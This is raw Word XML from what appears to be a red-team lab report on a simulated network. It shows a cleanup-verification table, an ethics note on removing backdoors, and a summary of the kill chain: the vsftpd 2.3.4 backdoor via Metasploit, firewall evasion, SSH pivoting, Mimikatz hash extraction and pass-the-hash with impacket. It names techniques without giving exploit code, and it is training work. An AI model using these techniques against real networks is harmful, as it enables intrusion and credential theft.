                <w:spacing w:val="-4"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="490" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="269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No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malicious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scheduled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tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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schtasks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/query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="105"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>No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"updater"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or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attacker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tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="760" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="269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No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DCSync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permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3541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BloodHound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replication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rights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query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:left="105" w:right="146"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>No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non-DC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accounts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with replication rights</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="735" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="269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No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hidden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admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3541" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="27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Get-ADGroupMember "Domain Admins"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="105"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Only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legitimate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admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="737" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="269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Logs </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>intact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="354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Review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event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logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="311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ind w:left="105" w:right="146"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>No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suspicious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gaps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log </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>timestamps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Learning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Goal:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="302"/>
        <w:ind w:left="720" w:right="1158" w:firstLine="705"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Leaving backdoors, shells, or unauthorized accounts behind after a penetration test is a serious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>violation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professional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ethics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major</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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risk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client.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>or persistent backdoor could be discovered and abused by real threat actors, effectively making</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t> the red teamer responsible for a breach.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158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Every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persistence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mechanism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documented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during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engagement.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10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Cleanup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optional —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contractual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ethical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obligation.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9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Verification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cleanup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important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cleanup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itself.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pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1420" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1441" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="79" w:after="0"/>
        <w:ind w:left="1441" w:right="1362" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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professional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engagement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concludes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only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when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client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verify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their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systems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are back to their pre-test state.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1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>04#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>FINAL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="304"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Executive Summary:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="306"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>During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12-week</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>structured</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>assessment,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Cyberster</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Red</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Team</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>successfully demonstrated a complete, end-to-end attack chain against the simulated corporate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="273" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="1129"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>achieving</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>full</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Administrator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access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ability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compromise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>every system, credential, and confidential resource within the organization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="259" w:lineRule="auto" w:before="167"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pP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finding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>point</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>did</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploit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vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>drive the attack. Every stage of compromise was achieved through misconfigurations, outdated software, and poor security hygiene — issues that are entirely preventable with standard security practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="189"/>
        <w:rPr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6"/>
        <w:gridCol w:w="6928"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="380" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2426" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="1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Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6928" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="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Business</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:spacing w:val="-3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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="320" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="242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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6928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Attacker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mapped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entire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network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surface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minutes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using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free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tools.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="325" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="242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Initial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Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6928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A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backdoored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FTP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service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provided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instant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root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access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="3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no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password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needed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="590" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="242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Credential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Theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6928" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:right="131"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ALL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employee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passwords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were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extracted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cracked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from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compromised </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="320" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="242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Lateral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Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6928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From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breached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system,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every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server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network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was</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> reachable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="325" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="242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Domain </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Dominance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6928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A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single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attacker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now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controls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entire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IT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infrastructure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permanently.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Technical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="306"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>complete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>technical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>kill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>chain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documented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Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>02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report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supporting screenshots, commands, and outputs. Key technical highlights are summarized below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="249"/>
        <w:ind w:left="715"/>
      </w:pPr>
      <w:bookmarkStart w:name="Reconnaissance:" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Reconnaissance:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="93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23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open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ports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identified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Metasploitable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2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full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service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version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mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2146" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="14" w:after="0"/>
        <w:ind w:left="2146" w:right="1553" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Multiple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CRITICAL-rated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services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discovered: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vsftpd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2.3.4,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UnrealIRCd,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Samba </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.0.20.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2146" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="261" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2146" w:right="1272" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Firewall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evasion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techniques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(packet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fragmentation,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decoy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scanning)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successfully bypassed detection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="261" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20"/>
        <w:ind w:left="715" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Initial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="2D2D2D"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="2D2D2D"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>: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103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vsftpd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2.3.4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backdoor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(CVE-2011-2523)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exploited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via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Metasploit2-immediate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root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shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="265"/>
        <w:ind w:left="715"/>
      </w:pPr>
      <w:bookmarkStart w:name="Lateral Movement:" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Lateral</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Movement:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1441" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto" w:before="98" w:after="0"/>
        <w:ind w:left="1441" w:right="1260" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SSH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dynamic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tunneling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established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pivot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through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Metasploitable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2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isolated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Windows 7 machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1441" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1441" w:right="1663" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Metasploit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autoroute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enabled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internal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network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scanning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through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compromised </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1441" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1441" w:right="1515" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kiwi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(in-memory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Mimikatz)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extracted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NTLM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hashes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without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triggering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AV-100%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disk-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>free.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1441" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1441" w:right="1557" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pass-the-Hash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impacket-wmiexec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provided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admin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access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Windows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7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without </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
